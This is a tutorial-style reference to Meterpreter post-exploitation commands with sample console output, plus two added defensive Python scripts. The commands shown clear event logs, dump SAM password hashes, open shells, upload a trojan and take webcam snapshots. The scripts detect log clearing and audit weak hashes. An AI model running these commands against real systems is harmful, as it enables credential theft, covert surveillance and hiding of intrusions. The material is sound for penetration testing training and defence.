
Common Meterpreter commands

METERPRETER COMMAND USAGE

All the commands are covered below; for anything not covered, trying it yourself is the only real test.

HELP

Display the help menu:

meterpreter > help

Core Commands
=============

Command Description
------- -----------
? Help menu
background Backgrounds the current session
channel Displays information about active channels
...snip...

BACKGROUND

Put the current session into the background and return to the 'msf' prompt. To get back into the session, select it with the sessions command:

meterpreter > background
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

CAT

Display the contents of a file:

meterpreter > cat
Usage: cat file

Example usage:
meterpreter > cat edit.txt
What you talkin' about Willis

meterpreter >

CD AND PWD

Change the working directory and show the current directory:

Arguments:

cd:	Path of the folder to change to
pwd: None required

Example:

meterpreter > pwd
c:\
meterpreter > cd c:\windows
meterpreter > pwd
c:\windows
meterpreter >

CLEAREV

Clear the Windows event logs (Clear Event); these logs are what an administrator sees in the Event Viewer. The clearev command will clear the Application, System, and Security logs on a Windows system. There are no options or arguments.

[Image: Event Viewer before using Meterpreter to clear the logs]

Usage:

meterpreter > clearev
[*] Wiping 97 records from Application...
[*] Wiping 415 records from System...
[*] Wiping 0 records from Security...
meterpreter >

[Image: Event Viewer after using Meterpreter to clear the logs]
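On the defensive side, clearing a log is itself logged: the Security log records Event ID 1102 and the System log records Event ID 104 (provider Microsoft-Windows-Eventlog) when a log is cleared. As an added example, not from this page or from Metasploit, the script below scans constructed event records for those IDs and groups clears that land within a short window, which is the pattern a clearev run leaves when it wipes all three logs in one go; the field names assume a flattened event export.

```python
from datetime import datetime, timedelta

# Constructed sample records shaped like a flattened event-log export (not real logs).
SAMPLE_EVENTS = [
    {"TimeCreated": "2012-03-01T13:50:01", "Channel": "Application",
     "Provider": "MsiInstaller", "EventID": 11707, "SubjectUserName": "Administrator"},
    {"TimeCreated": "2012-03-01T13:52:10", "Channel": "System",
     "Provider": "Microsoft-Windows-Eventlog", "EventID": 104, "SubjectUserName": "SYSTEM"},
    {"TimeCreated": "2012-03-01T13:52:11", "Channel": "Security",
     "Provider": "Microsoft-Windows-Eventlog", "EventID": 1102, "SubjectUserName": "SYSTEM"},
    {"TimeCreated": "2012-03-01T14:00:00", "Channel": "Security",
     "Provider": "Microsoft-Windows-Security-Auditing", "EventID": 4624, "SubjectUserName": "victim"},
]

# (channel, event id) pairs that record a log being cleared:
# 1102 in Security = audit log cleared; 104 in System = System/Application log cleared.
LOG_CLEAR_IDS = {("Security", 1102), ("System", 104)}


def find_log_clears(events):
    """Return the events that record an event log being cleared, oldest first."""
    hits = [e for e in events
            if (e["Channel"], e["EventID"]) in LOG_CLEAR_IDS
            and e["Provider"] == "Microsoft-Windows-Eventlog"]
    return sorted(hits, key=lambda e: e["TimeCreated"])


def find_burst_clears(events, window_seconds=60):
    """Group clear events that fall within window_seconds of the previous one.
    Several logs cleared together is what clearev looks like; a single clear
    is more often an administrator tidying one log."""
    bursts, current = [], []
    for e in find_log_clears(events):
        t = datetime.fromisoformat(e["TimeCreated"])
        if current:
            prev = datetime.fromisoformat(current[-1]["TimeCreated"])
            if t - prev > timedelta(seconds=window_seconds):
                bursts.append(current)
                current = []
        current.append(e)
    if current:
        bursts.append(current)
    return [b for b in bursts if len(b) >= 2]


if __name__ == "__main__":
    for burst in find_burst_clears(SAMPLE_EVENTS):
        ids = [(e["Channel"], e["EventID"]) for e in burst]
        print("possible mass log clear starting", burst[0]["TimeCreated"], ids)
```

Because clearev wipes the logs in the order shown above, the 104 written for the Application clear lands in the System log and is wiped moments later by the System clear, so on the host only the 104 for System and the 1102 for Security survive; a forwarded copy (event forwarding or a SIEM) keeps the full record.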

DOWNLOAD

Download a file from the target. Note that backslashes in the path must be doubled:

meterpreter > download c:\\boot.ini
[*] downloading: c:\boot.ini -> c:\boot.ini
[*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini
meterpreter >

EDIT

Edit a file with vim:

Example:

meterpreter > ls

Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
.
...snip...
.
100666/rw-rw-rw- 0 fil 2012-03-01 13:47:10 -0500 edit.txt

meterpreter > edit edit.txt

For more advanced usage, see http://www.vim.org/

EXECUTE

Execute a command on the target machine:

meterpreter > execute -f cmd.exe -i -H
Process 38320 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

GETUID

Return the user that the Meterpreter server is running as on the target host:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

HASHDUMP

Dump the contents of the Windows SAM database:

meterpreter > run post/windows/gather/hashdump 

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3:::
dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9:::
victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
meterpreter >
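Each line of the output above is in pwdump format, user:RID:LM hash:NT hash:::. As an added example, not from this page or from Metasploit, the script below audits such output from a remediation standpoint: it parses each line, skips malformed ones, and flags accounts with a blank password, accounts whose LM hash is still stored (the NoLMHash policy is not enforced), and passwords shared between accounts. The sample lines are constructed placeholders; only the two empty-password hash constants are real values.

```python
import re

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty password, or LM storage disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

# user:RID:LM:NT::: with exactly 32 hex digits per hash
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::$", re.IGNORECASE)

# Constructed sample dump (placeholder hashes, not real accounts), including one bad line.
SAMPLE_DUMP = """\
Administrator:500:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
helpdesk:1002:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
broken line without the expected fields
"""


def parse_dump(text):
    """Return (accounts, bad_lines); accounts are dicts with user, rid, lm, nt."""
    accounts, bad = [], []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            bad.append(line)
            continue
        user, rid, lm, nt = m.groups()
        accounts.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return accounts, bad


def audit(accounts):
    """Return (who, finding) pairs that need remediation."""
    findings, by_nt = [], {}
    for a in accounts:
        if a["nt"] == EMPTY_NT:
            findings.append((a["user"], "blank password"))
        if a["lm"] != EMPTY_LM:
            findings.append((a["user"], "LM hash stored (NoLMHash not enforced)"))
        by_nt.setdefault(a["nt"], []).append(a["user"])
    for nt, users in by_nt.items():
        # The same NT hash on two accounts means the same password is reused.
        if nt != EMPTY_NT and len(users) > 1:
            findings.append((",".join(sorted(users)), "same password reused"))
    return findings


if __name__ == "__main__":
    accounts, bad = parse_dump(SAMPLE_DUMP)
    for who, what in audit(accounts):
        print(f"{who}: {what}")
    print(f"{len(bad)} unparsable line(s) skipped")
```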

IDLETIME

Return how long the user on the remote host has been idle:

meterpreter > idletime
User has been idle for: 5 hours 26 mins 35 secs
meterpreter >

IPCONFIG

Display the network configuration of the remote host:

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:10:f5:15
IP Address : 192.168.1.104
Netmask : 255.255.0.0

meterpreter >

LPWD AND LCD

Show and change the local working directory, i.e. the directory on the attacking machine:

Arguments:

lpwd:		None required
lcd: Destination folder

Example:

meterpreter > lpwd
/root

meterpreter > lcd MSFU
meterpreter > lpwd
/root/MSFU

meterpreter > lcd /var/www
meterpreter > lpwd
/var/www
meterpreter >

LS

List the files in the current directory on the remote host:

meterpreter > ls

Listing: C:\Documents and Settings\victim
=========================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir Sat Oct 17 07:40:45 -0600 2009 .
40777/rwxrwxrwx 0 dir Fri Jun 19 13:30:00 -0600 2009 ..
100666/rw-rw-rw- 218 fil Sat Oct 03 14:45:54 -0600 2009 .recently-used.xbel
40555/r-xr-xr-x 0 dir Wed Nov 04 19:44:05 -0700 2009 Application Data
...snip...

MIGRATE

Migrate into another process:

meterpreter > run post/windows/manage/migrate 

[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1076)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)
meterpreter >

PS

List the processes currently running on the target:

meterpreter > ps

Process list
============

PID Name Path
--- ---- ----
132 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe
152 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe
288 snmp.exe C:\WINDOWS\System32\snmp.exe
...snip...

RESOURCE

The resource command executes the Meterpreter commands stored in a text file, one line at a time. By default the commands run in the target's current directory, while the resource file itself is read from the local working directory on the attacking machine.

meterpreter > resource
Usage: resource path1 path2
Run the commands stored in the supplied files.
meterpreter >

Arguments:

path1:		Location of the file containing the commands to run
Path2Run: Location of the commands to run, as found in the file

Example

The resource file used is as follows:

root@kali:~# cat resource.txt
ls
background
root@kali:~#

Run the resource command:

meterpreter > resource resource.txt
[*] Reading /root/resource.txt
[*] Running ls

Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2012-02-29 16:41:29 -0500 .
40777/rwxrwxrwx 0 dir 2012-02-02 12:24:40 -0500 ..
100666/rw-rw-rw- 606 fil 2012-02-15 17:37:48 -0500 IDA Pro Free.lnk
100777/rwxrwxrwx 681984 fil 2012-02-02 15:09:18 -0500 Sc303.exe
100666/rw-rw-rw- 608 fil 2012-02-28 19:18:34 -0500 Shortcut to Ability Server.lnk
100666/rw-rw-rw- 522 fil 2012-02-02 12:33:38 -0500 XAMPP Control Panel.lnk

[*] Running background

[*] Backgrounding session 1...
msf exploit(handler) >

SEARCH

Search the target for specific files. The search can cover the whole system or a specified directory, and the file pattern may contain wildcards.

meterpreter > search
[-] You must specify a valid file glob to search for, e.g. >search -f *.doc

Arguments:

File pattern:	 	May contain wildcards
Search location: Optional, if none is given the whole system will be searched.

Example:

meterpreter > search -f autoexec.bat
Found 1 result...
c:\AUTOEXEC.BAT
meterpreter > search -f sea*.bat c:\\xamp\\
Found 1 result...
c:\\xampp\perl\bin\search.bat (57035 bytes)
meterpreter >

SHELL

Return a standard shell on the target machine:

meterpreter > shell
Process 39640 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

UPLOAD

Upload a file to the target. As with the download command, backslashes in the path must be doubled:

meterpreter > upload evil_trojan.exe c:\\windows\\system32
[*] uploading : evil_trojan.exe -> c:\windows\system32
[*] uploaded : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe
meterpreter >

WEBCAM_LIST

List the webcam devices available on the target machine.

Example:

meterpreter > webcam_list
1: Creative WebCam NX Pro
2: Creative WebCam NX Pro (VFW)
meterpreter >

WEBCAM_SNAP

Grab a frame from a connected webcam on the target and save it as a JPEG with a random filename in the local current working directory.

meterpreter > webcam_snap -h
Usage: webcam_snap [options]
Grab a frame from the specified webcam.

OPTIONS:

-h Help Banner
-i The index of the webcam to use (Default: 1)
-p The JPEG image path (Default: 'gnFjTnzi.jpeg')
-q The JPEG image quality (Default: '50')
-v Automatically view the JPEG image (Default: 'true')

meterpreter >

Options:

-h:	Displays the help information for the command
-i opt: If more than one webcam is connected, use this option to select the device to capture the image from
-p opt: Change the path and filename of the image to be saved
-q opt: The image quality, 50 being the default/medium setting, 100 being the best quality
-v opt: By default the value is true, which opens the image after capture.

Example:

meterpreter > webcam_snap -i 1 -v false
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/Offsec/YxdhwpeQ.jpeg
meterpreter >